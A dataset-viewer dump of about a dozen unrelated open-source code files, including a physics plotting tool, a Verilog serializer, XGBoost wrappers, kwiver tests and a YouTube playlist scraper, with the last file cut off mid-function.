max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
Alignment/APEEstimation/test/plottingTools/systematicErrors.py | ckamtsikis/cmssw | 852 | 12657552 | import numpy as np
import ROOT
DIR_BOTH = 0
DIR_UP = 1
DIR_DOWN = -1
NUM_SECTORS = 68
NUM_SECTORS_Y = 14
# systematics has:
# a dict with with coordinate names "X", "Y" as keys
# - each value of these keys is a list/an array of systematic errors for each sector
# - so the list has the length of the number of sectors for that coordinate
# - these errors are quadratically added
# direction which can be DIR_DOWN, DIR_BOTH, or DIR_UP, depending on whether it adds only down, symmetric or up
# isRelative which is a flag telling whether the error is relative to the APE value or absolute
class SystematicErrors:
def __init__(self):
self.X = np.zeros(NUM_SECTORS)
self.Y = np.zeros(NUM_SECTORS)
# is not made seperately for X and Y. If this is wanted, make two separate objects
self.isRelative = np.zeros(NUM_SECTORS, dtype=int)
self.direction = np.empty(NUM_SECTORS, dtype=int)
self.direction.fill(DIR_BOTH) # just so it is clear that
def __getitem__(self, key):
return getattr(self, key)
def getXFromList(self, X, startat=0):
for i,x in enumerate(X):
self.X[i+startat] = x
def getYFromList(self, Y, startat=0):
for i,y in enumerate(Y):
self.Y[i+startat] = y
# each line has the structure: xerr yerr isrel direction
def write(self, fileName):
with open(fileName, "w") as fi:
for x, y, rel, direc in zip(self.X, self.X, self.isRelative, self.direction):
fi.write("{} {} {} {}".format(x, y, rel, direc))
def read(self, fileName):
with open(fileName, "r") as fi:
sector = 0
for line in fi:
x, y, rel, direc = line.rstrip().split(" ")
self.X[sector] = float(x)
self.Y[sector] = float(y)
self.isRelative[sector] = int(rel)
self.direction[sector] = int(direc)
sector += 1
return self
# difference between ape values in each sector
# returns a SystematicErrors object with values
def apeDifference(minuend, subtrahend):
fileA = ROOT.TFile(minuend, "READ")
fileB = ROOT.TFile(subtrahend, "READ")
apeTreeA_X = fileA.Get("iterTreeX")
apeTreeA_X.SetDirectory(0)
apeTreeB_X = fileB.Get("iterTreeX")
apeTreeB_X.SetDirectory(0)
apeTreeA_Y = fileA.Get("iterTreeY")
apeTreeA_Y.SetDirectory(0)
apeTreeB_Y = fileB.Get("iterTreeY")
apeTreeB_Y.SetDirectory(0)
fileA.Close()
fileB.Close()
# get to last iteration of each tree
apeTreeA_X.GetEntry(apeTreeA_X.GetEntries()-1)
apeTreeB_X.GetEntry(apeTreeB_X.GetEntries()-1)
apeTreeA_Y.GetEntry(apeTreeA_Y.GetEntries()-1)
apeTreeB_Y.GetEntry(apeTreeB_Y.GetEntries()-1)
difference = SystematicErrors()
isRel = 0
direc = 0
for sector in range(1, NUM_SECTORS+1):
name = "Ape_Sector_{}".format(sector)
diffX = abs(getattr(apeTreeA_X, name) - getattr(apeTreeB_X, name))
difference.X[sector-1] = diffX
if sector <= NUM_SECTORS_Y:
diffY = abs(getattr(apeTreeA_Y, name) - getattr(apeTreeB_Y, name))
difference.Y[sector-1] = diffY
difference.isRel[sector-1] = isRel
difference.direction[sector-1] = direc
return difference
# inFile is allData.root, not allData_iterationApe.root
# returns two arrays with values in x and y
def numberOfHits(inFileName):
inFile = ROOT.TFile(inFileName, "READ")
num_x = np.zeros(NUM_SECTORS, dtype=int)
num_y = np.zeros(NUM_SECTORS, dtype=int)
for sector in range(1, NUM_SECTORS+1):
xhist = inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResX".format(sector))
num_x[sector-1] = xhist.GetEntries()
if sector <= NUM_SECTORS_Y:
yhist = inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResY".format(sector))
num_y[sector-1] = yhist.GetEntries()
inFile.Close()
return num_x, num_y
def main():
pass
if __name__ == "__main__":
main()
|
hwt/serializer/verilog/serializer.py | ufo2011/hwt | 134 | 12657553 | from copy import copy
from typing import Optional, List
from hdlConvertorAst.hdlAst import HdlStmIf, HdlOp, \
HdlOpType, HdlValueId, HdlModuleDec, iHdlStatement
from hdlConvertorAst.hdlAst._defs import HdlIdDef
from hdlConvertorAst.hdlAst._expr import HdlTypeAuto
from hdlConvertorAst.hdlAst._statements import HdlStmProcess, HdlStmBlock, HdlStmAssign, \
HdlStmWait
from hdlConvertorAst.to.verilog.keywords import IEEE1800_2017_KEYWORDS
from hdlConvertorAst.translate.common.name_scope import LanguageKeyword, NameScope
from hdlConvertorAst.translate.verilog_to_basic_hdl_sim_model.utils import hdl_call
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.types.array import HArray
from hwt.hdl.types.defs import STR, INT, BOOL
from hwt.serializer.generic.to_hdl_ast import ToHdlAst
from hwt.serializer.verilog.context import SignalTypeSwap
from hwt.serializer.verilog.ops import ToHdlAstVerilog_ops
from hwt.serializer.verilog.statements import ToHdlAstVerilog_statements
from hwt.serializer.verilog.types import ToHdlAstVerilog_types
from hwt.serializer.verilog.utils import SIGNAL_TYPE, verilogTypeOfSig
from hwt.serializer.verilog.value import ToHdlAstVerilog_Value
class ToHdlAstVerilog(ToHdlAstVerilog_types,
ToHdlAstVerilog_Value, ToHdlAstVerilog_statements,
ToHdlAstVerilog_ops, ToHdlAst):
_keywords_dict = {kw: LanguageKeyword() for kw in IEEE1800_2017_KEYWORDS}
def __init__(self, name_scope: Optional[NameScope]=None):
ToHdlAst.__init__(self, name_scope=name_scope)
self.signalType = SIGNAL_TYPE.PORT_WIRE
def as_hdl_HdlModuleDef_variable(
self, v, types, hdl_types, hdl_variables,
processes, component_insts):
new_v = copy(v)
with SignalTypeSwap(self, verilogTypeOfSig(v.origin)):
t = v.type
# if type requires extra definition
if self.does_type_requires_extra_def(t, types):
_t = self.as_hdl_HdlType(t, declaration=True)
hdl_types.append(_t)
types.add(t)
new_v.type = self.as_hdl_HdlType(t, declaration=False)
# this is a array variable which requires value intialization in init
# process
if isinstance(t, HArray):
if v.value.vld_mask:
rom = v.origin
p = HdlStmProcess()
label = self.name_scope.checked_name(rom.name + "_rom_init", p)
p.labels.append(label)
p.body = HdlStmBlock()
body = p.body.body
for i, _v in enumerate(rom.def_val.val):
a = HdlStmAssign(self.as_hdl_int(int(_v)),
self.as_hdl(rom[i]))
a.is_blocking = True
body.append(a)
w = HdlStmWait()
w.val = [] # initial process
body.append(w)
processes.append(p)
# because we would not be able to initialize const/localparam variable later
new_v.is_const = False
new_v.value = None
elif new_v.value is not None:
if new_v.value.vld_mask:
new_v.value = self.as_hdl_Value(new_v.value)
else:
# 'x' is a default value no need to specify it extra
new_v.value = None
return new_v
def _static_assert_false(self, msg:str):
return hdl_call(HdlValueId("$error"), [f"%m {msg:s}"])
def _static_assert_symbol_eq(self, symbol_name:str, v):
i = HdlStmIf()
i.in_preproc = True
# [TODO] this actually requires SV>=2009
# generate
# if (p==x) begin
# $error("%m Generated only for this param value");
# end
# endgenerate
i.cond = HdlOp(HdlOpType.NE, [HdlValueId(symbol_name), v])
i.if_true = hdl_call(HdlValueId("$error"), [
"%m Generated only for this param value",
])
return i
def as_hdl_GenericItem(self, g: HdlIdDef):
with SignalTypeSwap(self, SIGNAL_TYPE.PORT_WIRE):
new_v = copy(g)
v = g.value
if v._dtype == STR or v._dtype == INT or v._dtype == BOOL:
t = HdlTypeAuto
else:
t = self.as_hdl_HdlType(v._dtype)
new_v.type = t
assert new_v.value is not None, g
new_v.value = self.as_hdl_Value(v)
return new_v
def as_hdl_HdlPortItem(self, pi: HdlPortItem):
with SignalTypeSwap(self, verilogTypeOfSig(pi)):
v = super(ToHdlAstVerilog, self).as_hdl_HdlPortItem(pi)
v.is_latched = self.signalType == SIGNAL_TYPE.PORT_REG
return v
def _as_hdl_HdlModuleDef_param_asserts(self, new_m: HdlModuleDec) -> List[iHdlStatement]:
return ToHdlAst._as_hdl_HdlModuleDef_param_asserts_real(self, new_m)
|
cwltool/singularity_utils.py | RenskeW/cwltool | 289 | 12657559 | <gh_stars>100-1000
"""Support for executing Docker containers using the Singularity 2.x engine."""
import os
import os.path
from subprocess import DEVNULL, PIPE, Popen, TimeoutExpired # nosec
from typing import Optional
_USERNS = None # type: Optional[bool]
def singularity_supports_userns() -> bool:
"""Confirm if the version of Singularity install supports the --userns flag."""
global _USERNS # pylint: disable=global-statement
if _USERNS is None:
try:
hello_image = os.path.join(os.path.dirname(__file__), "hello.simg")
result = Popen( # nosec
["singularity", "exec", "--userns", hello_image, "true"],
stderr=PIPE,
stdout=DEVNULL,
universal_newlines=True,
).communicate(timeout=60)[1]
_USERNS = (
"No valid /bin/sh" in result
or "/bin/sh doesn't exist in container" in result
or "executable file not found in" in result
)
except TimeoutExpired:
_USERNS = False
return _USERNS
|
glance/async_/flows/plugins/__init__.py | daespinel/glance | 309 | 12657563 | # Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from stevedore import named
CONF = cfg.CONF
def get_import_plugins(**kwargs):
task_list = CONF.image_import_opts.image_import_plugins
extensions = named.NamedExtensionManager('glance.image_import.plugins',
names=task_list,
name_order=True,
invoke_on_load=True,
invoke_kwds=kwargs)
for extension in extensions.extensions:
yield extension.obj
|
deps/zxing/zxing.gyp | rwaldron/node-dv | 264 | 12657594 | <reponame>rwaldron/node-dv
{
'includes': [ '../common.gyp' ],
'targets': [
{
'target_name': 'libzxing',
'type': 'static_library',
'include_dirs': [
'core/src',
],
'sources': [
'core/src/bigint/BigInteger.cc',
'core/src/bigint/BigIntegerAlgorithms.cc',
'core/src/bigint/BigIntegerUtils.cc',
'core/src/bigint/BigUnsigned.cc',
'core/src/bigint/BigUnsignedInABase.cc',
'core/src/zxing/BarcodeFormat.cpp',
'core/src/zxing/Binarizer.cpp',
'core/src/zxing/BinaryBitmap.cpp',
'core/src/zxing/ChecksumException.cpp',
'core/src/zxing/DecodeHints.cpp',
'core/src/zxing/Exception.cpp',
'core/src/zxing/FormatException.cpp',
'core/src/zxing/InvertedLuminanceSource.cpp',
'core/src/zxing/LuminanceSource.cpp',
'core/src/zxing/MultiFormatReader.cpp',
'core/src/zxing/Reader.cpp',
'core/src/zxing/Result.cpp',
'core/src/zxing/ResultIO.cpp',
'core/src/zxing/ResultPoint.cpp',
'core/src/zxing/ResultPointCallback.cpp',
'core/src/zxing/aztec/AztecDetectorResult.cpp',
'core/src/zxing/aztec/AztecReader.cpp',
'core/src/zxing/aztec/decoder/1Decoder.cpp',
'core/src/zxing/aztec/detector/1Detector.cpp',
'core/src/zxing/common/BitArray.cpp',
'core/src/zxing/common/BitArrayIO.cpp',
'core/src/zxing/common/BitMatrix.cpp',
'core/src/zxing/common/BitSource.cpp',
'core/src/zxing/common/CharacterSetECI.cpp',
'core/src/zxing/common/DecoderResult.cpp',
'core/src/zxing/common/DetectorResult.cpp',
'core/src/zxing/common/GlobalHistogramBinarizer.cpp',
'core/src/zxing/common/GreyscaleLuminanceSource.cpp',
'core/src/zxing/common/GreyscaleRotatedLuminanceSource.cpp',
'core/src/zxing/common/GridSampler.cpp',
'core/src/zxing/common/HybridBinarizer.cpp',
'core/src/zxing/common/IllegalArgumentException.cpp',
'core/src/zxing/common/PerspectiveTransform.cpp',
'core/src/zxing/common/Str.cpp',
'core/src/zxing/common/StringUtils.cpp',
'core/src/zxing/common/detector/MonochromeRectangleDetector.cpp',
'core/src/zxing/common/detector/WhiteRectangleDetector.cpp',
'core/src/zxing/common/reedsolomon/GenericGF.cpp',
'core/src/zxing/common/reedsolomon/GenericGFPoly.cpp',
'core/src/zxing/common/reedsolomon/ReedSolomonDecoder.cpp',
'core/src/zxing/common/reedsolomon/ReedSolomonException.cpp',
'core/src/zxing/datamatrix/1Version.cpp',
'core/src/zxing/datamatrix/DataMatrixReader.cpp',
'core/src/zxing/datamatrix/decoder/1BitMatrixParser.cpp',
'core/src/zxing/datamatrix/decoder/1DataBlock.cpp',
'core/src/zxing/datamatrix/decoder/1DecodedBitStreamParser.cpp',
'core/src/zxing/datamatrix/decoder/2Decoder.cpp',
'core/src/zxing/datamatrix/detector/2Detector.cpp',
'core/src/zxing/datamatrix/detector/CornerPoint.cpp',
'core/src/zxing/datamatrix/detector/DetectorException.cpp',
'core/src/zxing/multi/ByQuadrantReader.cpp',
'core/src/zxing/multi/GenericMultipleBarcodeReader.cpp',
'core/src/zxing/multi/MultipleBarcodeReader.cpp',
'core/src/zxing/multi/qrcode/QRCodeMultiReader.cpp',
'core/src/zxing/multi/qrcode/detector/MultiDetector.cpp',
'core/src/zxing/multi/qrcode/detector/MultiFinderPatternFinder.cpp',
'core/src/zxing/oned/CodaBarReader.cpp',
'core/src/zxing/oned/Code128Reader.cpp',
'core/src/zxing/oned/Code39Reader.cpp',
'core/src/zxing/oned/Code93Reader.cpp',
'core/src/zxing/oned/EAN13Reader.cpp',
'core/src/zxing/oned/EAN8Reader.cpp',
'core/src/zxing/oned/ITFReader.cpp',
'core/src/zxing/oned/MultiFormatOneDReader.cpp',
'core/src/zxing/oned/MultiFormatUPCEANReader.cpp',
'core/src/zxing/oned/OneDReader.cpp',
'core/src/zxing/oned/OneDResultPoint.cpp',
'core/src/zxing/oned/UPCAReader.cpp',
'core/src/zxing/oned/UPCEANReader.cpp',
'core/src/zxing/oned/UPCEReader.cpp',
'core/src/zxing/pdf417/PDF417Reader.cpp',
'core/src/zxing/pdf417/decoder/2BitMatrixParser.cpp',
'core/src/zxing/pdf417/decoder/2DecodedBitStreamParser.cpp',
'core/src/zxing/pdf417/decoder/3Decoder.cpp',
'core/src/zxing/pdf417/decoder/ec/ErrorCorrection.cpp',
'core/src/zxing/pdf417/decoder/ec/ModulusGF.cpp',
'core/src/zxing/pdf417/decoder/ec/ModulusPoly.cpp',
'core/src/zxing/pdf417/detector/3Detector.cpp',
'core/src/zxing/pdf417/detector/LinesSampler.cpp',
'core/src/zxing/qrcode/2Version.cpp',
'core/src/zxing/qrcode/ErrorCorrectionLevel.cpp',
'core/src/zxing/qrcode/FormatInformation.cpp',
'core/src/zxing/qrcode/QRCodeReader.cpp',
'core/src/zxing/qrcode/decoder/2DataBlock.cpp',
'core/src/zxing/qrcode/decoder/3BitMatrixParser.cpp',
'core/src/zxing/qrcode/decoder/3DecodedBitStreamParser.cpp',
'core/src/zxing/qrcode/decoder/4Decoder.cpp',
'core/src/zxing/qrcode/decoder/DataMask.cpp',
'core/src/zxing/qrcode/decoder/Mode.cpp',
'core/src/zxing/qrcode/detector/4Detector.cpp',
'core/src/zxing/qrcode/detector/AlignmentPattern.cpp',
'core/src/zxing/qrcode/detector/AlignmentPatternFinder.cpp',
'core/src/zxing/qrcode/detector/FinderPattern.cpp',
'core/src/zxing/qrcode/detector/FinderPatternFinder.cpp',
'core/src/zxing/qrcode/detector/FinderPatternInfo.cpp',
],
'conditions': [
['OS=="win"',
{
'include_dirs': [
'core/src/win32/zxing/',
],
'sources': [
'core/src/win32/zxing/win_iconv.c',
],
}
],
],
},
]
}
|
users/urls.py | hrbhat/twissandra | 308 | 12657606 | <filename>users/urls.py
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('users.views',
url('^login/$', 'login', name='login'),
url('^logout/$', 'logout', name='logout'),
url(r'^find-friends/$', 'find_friends', name='find_friends'),
url(r'^modify-friend/$', 'modify_friend', name='modify_friend'),
) |
pytorch_neat/aggregations.py | GPittia/PyTorch-NEAT | 486 | 12657641 | # Copyright (c) 2018 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import reduce
from operator import mul
def sum_aggregation(inputs):
return sum(inputs)
def prod_aggregation(inputs):
return reduce(mul, inputs, 1)
str_to_aggregation = {
'sum': sum_aggregation,
'prod': prod_aggregation,
}
|
Code/Chenglong/utils/xgb_utils.py | ChenglongChen/Kaggle_Homedepot | 465 | 12657671 | <filename>Code/Chenglong/utils/xgb_utils.py
# -*- coding: utf-8 -*-
"""
@author: <NAME> <<EMAIL>>
@brief: utils for XGBoost models
"""
import numpy as np
import matplotlib
matplotlib.use('Agg')
import xgboost as xgb
class XGBRegressor:
def __init__(self, booster='gbtree', base_score=0., colsample_bylevel=1.,
colsample_bytree=1., gamma=0., learning_rate=0.1, max_delta_step=0.,
max_depth=6, min_child_weight=1., missing=None, n_estimators=100,
nthread=1, objective='reg:linear', reg_alpha=1., reg_lambda=0.,
reg_lambda_bias=0., seed=0, silent=True, subsample=1.):
self.param = {
"objective": objective,
"booster": booster,
"eta": learning_rate,
"max_depth": max_depth,
"colsample_bylevel": colsample_bylevel,
"colsample_bytree": colsample_bytree,
"subsample": subsample,
"min_child_weight": min_child_weight,
"gamma": gamma,
"alpha": reg_alpha,
"lambda": reg_lambda,
"lambda_bias": reg_lambda_bias,
"seed": seed,
"silent": 1 if silent else 0,
"nthread": nthread,
"max_delta_step": max_delta_step,
}
self.missing = missing if missing is not None else np.nan
self.n_estimators = n_estimators
self.base_score = base_score
def __str__(self):
return self.__repr__()
def __repr__(self):
return ("%s(booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"
"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"
"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"
"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"
"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)" % (
self.__class__.__name__,
self.param["booster"],
self.base_score,
self.param["colsample_bylevel"],
self.param["colsample_bytree"],
self.param["gamma"],
self.param["eta"],
self.param["max_delta_step"],
self.param["max_depth"],
self.param["min_child_weight"],
str(self.missing),
self.n_estimators,
self.param["nthread"],
self.param["objective"],
self.param["alpha"],
self.param["lambda"],
self.param["lambda_bias"],
self.param["seed"],
self.param["silent"],
self.param["subsample"],
))
def fit(self, X, y, feature_names=None):
data = xgb.DMatrix(X, label=y, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0]))
self.model = xgb.train(self.param, data, self.n_estimators)
return self
def predict(self, X, feature_names=None):
data = xgb.DMatrix(X, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0]))
y_pred = self.model.predict(data)
return y_pred
def plot_importance(self):
ax = xgb.plot_importance(self.model)
self.save_topn_features()
return ax
def save_topn_features(self, fname="XGBRegressor_topn_features.txt", topn=-1):
ax = xgb.plot_importance(self.model)
yticklabels = ax.get_yticklabels()[::-1]
if topn == -1:
topn = len(yticklabels)
else:
topn = min(topn, len(yticklabels))
with open(fname, "w") as f:
for i in range(topn):
f.write("%s\n"%yticklabels[i].get_text())
class XGBClassifier:
def __init__(self, num_class=2, booster='gbtree', base_score=0., colsample_bylevel=1.,
colsample_bytree=1., gamma=0., learning_rate=0.1, max_delta_step=0.,
max_depth=6, min_child_weight=1., missing=None, n_estimators=100,
nthread=1, objective='multi:softprob', reg_alpha=1., reg_lambda=0.,
reg_lambda_bias=0., seed=0, silent=True, subsample=1.):
self.param = {
"objective": objective,
"booster": booster,
"eta": learning_rate,
"max_depth": max_depth,
"colsample_bylevel": colsample_bylevel,
"colsample_bytree": colsample_bytree,
"subsample": subsample,
"min_child_weight": min_child_weight,
"gamma": gamma,
"alpha": reg_alpha,
"lambda": reg_lambda,
"lambda_bias": reg_lambda_bias,
"seed": seed,
"silent": 1 if silent else 0,
"nthread": nthread,
"max_delta_step": max_delta_step,
"num_class": num_class,
}
self.missing = missing if missing is not None else np.nan
self.n_estimators = n_estimators
self.base_score = base_score
self.num_class = num_class
def __str__(self):
return self.__repr__()
def __repr__(self):
return ("%s(num_class=%d, booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"
"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"
"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"
"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"
"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)" % (
self.__class__.__name__,
self.num_class,
self.param["booster"],
self.base_score,
self.param["colsample_bylevel"],
self.param["colsample_bytree"],
self.param["gamma"],
self.param["eta"],
self.param["max_delta_step"],
self.param["max_depth"],
self.param["min_child_weight"],
str(self.missing),
self.n_estimators,
self.param["nthread"],
self.param["objective"],
self.param["alpha"],
self.param["lambda"],
self.param["lambda_bias"],
self.param["seed"],
self.param["silent"],
self.param["subsample"],
))
def fit(self, X, y, feature_names=None):
data = xgb.DMatrix(X, label=y, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0] * self.num_class))
self.model = xgb.train(self.param, data, self.n_estimators)
return self
def predict_proba(self, X, feature_names=None):
data = xgb.DMatrix(X, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0] * self.num_class))
proba = self.model.predict(data)
proba = proba.reshape(X.shape[0], self.num_class)
return proba
def predict(self, X, feature_names=None):
proba = self.predict_proba(X, feature_names=feature_names)
y_pred = np.argmax(proba, axis=1)
return y_pred
def plot_importance(self):
ax = xgb.plot_importance(self.model)
self.save_topn_features()
return ax
def save_topn_features(self, fname="XGBClassifier_topn_features.txt", topn=10):
ax = xgb.plot_importance(self.model)
yticklabels = ax.get_yticklabels()[::-1]
if topn == -1:
topn = len(yticklabels)
else:
topn = min(topn, len(yticklabels))
with open(fname, "w") as f:
for i in range(topn):
f.write("%s\n"%yticklabels[i].get_text())
class HomedepotXGBClassifier(XGBClassifier):
def __init__(self, booster='gbtree', base_score=0., colsample_bylevel=1.,
colsample_bytree=1., gamma=0., learning_rate=0.1, max_delta_step=0.,
max_depth=6, min_child_weight=1., missing=None, n_estimators=100,
nthread=1, objective='multi:softprob', reg_alpha=1., reg_lambda=0.,
reg_lambda_bias=0., seed=0, silent=True, subsample=1.):
super().__init__(num_class=1, booster=booster, base_score=base_score,
colsample_bylevel=colsample_bylevel, colsample_bytree=colsample_bytree,
gamma=gamma, learning_rate=learning_rate, max_delta_step=max_delta_step,
max_depth=max_depth, min_child_weight=min_child_weight, missing=missing,
n_estimators=n_estimators, nthread=nthread, objective=objective,
reg_alpha=reg_alpha, reg_lambda=reg_lambda, reg_lambda_bias=reg_lambda_bias,
seed=seed, silent=silent, subsample=subsample)
# encode relevance to label
self.encoder = {
1.00: 0,
1.25: 1,
1.33: 2,
1.50: 3,
1.67: 4,
1.75: 5,
2.00: 6,
2.25: 7,
2.33: 8,
2.50: 9,
2.67: 10,
2.75: 11,
3.00: 12,
}
# decode label to relevance
self.decoder = {v:k for k,v in self.encoder.items()}
self.num_class = len(self.encoder.keys())
self.param["num_class"] = self.num_class
def fit(self, X, y):
# encode relevance to label
y = list(map(self.encoder.get, y))
y = np.asarray(y, dtype=int)
super().fit(X, y)
return self
def predict(self, X):
y_pred = super().predict(X)
# decode label to relevance
y_pred = list(map(self.decoder.get, y_pred))
y_pred = np.asarray(y_pred, dtype=float)
return y_pred
|
python/kwiver/vital/tests/test_sfm_constraints.py | mwoehlke-kitware/kwiver | 176 | 12657681 | """
ckwg +31
Copyright 2020 by Kitware, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither name of Kitware, Inc. nor the names of any contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==============================================================================
Tests for Python interface to vital::sfm_constraints
"""
import nose.tools as nt
import unittest
import numpy as np
from kwiver.vital.modules import modules
from kwiver.vital.types.metadata import *
from kwiver.vital.types.metadata_traits import *
from kwiver.vital.types import (
Metadata,
LocalGeoCS,
rotation,
RotationD,
RotationF,
SFMConstraints,
geodesy,
GeoPoint,
metadata_tags as mt,
SimpleMetadataMap,
)
modules.load_known_modules()
class TestSFMConstraints(unittest.TestCase):
@classmethod
def setUp(self):
self.meta_ = SimpleMetadataMap()
self.geo_ = LocalGeoCS()
self.small_tag = [
mt.tags.VITAL_META_UNKNOWN,
mt.tags.VITAL_META_UNIX_TIMESTAMP,
mt.tags.VITAL_META_SLANT_RANGE,
mt.tags.VITAL_META_MISSION_ID,
mt.tags.VITAL_META_VIDEO_KEY_FRAME,
]
self.loc1 = np.array([-73.759291, 42.849631])
self.crs_ll = geodesy.SRID.lat_lon_WGS84
self.geo_pt1_ = GeoPoint(self.loc1, self.crs_ll)
self.geo_.geo_origin = self.geo_pt1_
def test_init(self):
s = SFMConstraints()
SFMConstraints(s)
SFMConstraints(self.meta_, self.geo_)
def test_properties(self):
# modules.load_known_modules()
# metadata property
s = SFMConstraints(self.meta_, self.geo_)
get_meta = s.metadata
nt.assert_equal(get_meta.size(), 0)
m = SimpleMetadataMap()
s.metadata = m
nt.assert_equal(s.metadata.size(), 0)
# local_geo_property
ret_geo = s.local_geo_cs
np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll),
self.geo_pt1_.location())
s = SFMConstraints()
s.local_geo_cs = self.geo_
ret_geo = s.local_geo_cs
np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll),
self.geo_pt1_.location())
def test_get_camera_position_prior_local(self):
s = SFMConstraints(self.meta_, self.geo_)
nt.assert_false(s.get_camera_position_prior_local(0, np.array([0, 1, 3])))
nt.assert_false(s.get_camera_position_prior_local(0, RotationD([1, 2, 3, 4])))
def test_camera_position_priors(self):
s = SFMConstraints(self.meta_, self.geo_)
nt.assert_dict_equal(s.get_camera_position_priors(), {})
def test_image_properties(self):
s = SFMConstraints(self.meta_, self.geo_)
s.store_image_size(0, 1080, 720)
a,b = 0,0
founda, foundb = False, False
founda, a = s.get_image_width(0, a)
foundb, b = s.get_image_height(0, b)
nt.ok_(founda)
nt.ok_(foundb)
nt.assert_equal(a, 1080)
nt.assert_equal(b, 720)
found_focal = True
focal_len = 0.1
found_focal, focal_len = s.get_focal_length_prior(0, focal_len)
nt.assert_false(found_focal)
nt.assert_almost_equal(focal_len, 0.1)
|
BlenderAddon/data.py | gamekit-developers/gamekit | 241 | 12657687 | <reponame>gamekit-developers/gamekit<filename>BlenderAddon/data.py<gh_stars>100-1000
bl_addon_data =
{
(2,5,3):
{
(0,0,601):
{
'binary_name':'ogrekit',
'api_compatibility':
{
31845:{
(0,0,601):(995,-1)
}
},
'binary_urls':
{
'linux-32':'<ogrekit 0.0.601 executable URL>',
'linux-64':'<ogrekit 0.0.601 executable URL>',
'windows-32':'<ogrekit 0.0.601 executable URL>',
'windows-64':'<ogrekit 0.0.601 executable URL>',
'osx-intel':'<ogrekit 0.0.601 executable URL>',
'osx-ppc':'<ogrekit 0.0.601 executable URL>'
}
}
}
} |
playx/playlist/youtube.py | Saul-Dickson/playx | 221 | 12657688 | <reponame>Saul-Dickson/playx<filename>playx/playlist/youtube.py
"""Youtube playlist related functions and classes
defined.
"""
import json
import requests
from bs4 import BeautifulSoup
import re
from playx.utility import exe
from playx.playlist.playlistbase import PlaylistBase, SongMetadataBase
from playx.stringutils import remove_punct
from playx.logger import Logger
# Setup logger
logger = Logger("YoutubePlaylist")
class YoutubeMetadata(SongMetadataBase):
def __init__(self, url="", title=""):
super().__init__(title, url, "")
self._create_search_query()
def _create_search_query(self):
"""
Create a search querry.
"""
self.search_query = self.URL
def display(self):
"""Be informative."""
logger.info("Title: {}".format(self.title))
class YoutubePlaylist(PlaylistBase):
"""
Class to store YouTube playlist data.
This is where we try to parse ourselves the results of the pages.
Only works for first 100 songs.
If we want to fetch more, we have to do other ajax request or simulate
scrolling which is another problem.
Refer to `YoutubePlaylist2`
"""
def __init__(self, URL, pl_start=None, pl_end=None):
"""Init the URl."""
super().__init__(pl_start, pl_end)
self.URL = URL
self.list_content_tuple = []
self.playlist_name = ""
self._DELETED = [
"deleted video",
"मेटाइएको भिडियो",
"private video",
]
def extract_name(self, name):
"""Extract the name of the playlist."""
name = str(name).replace("\n", "")
name = "".join(re.findall(r">.*?<", name)).replace(">", "").replace("<", "")
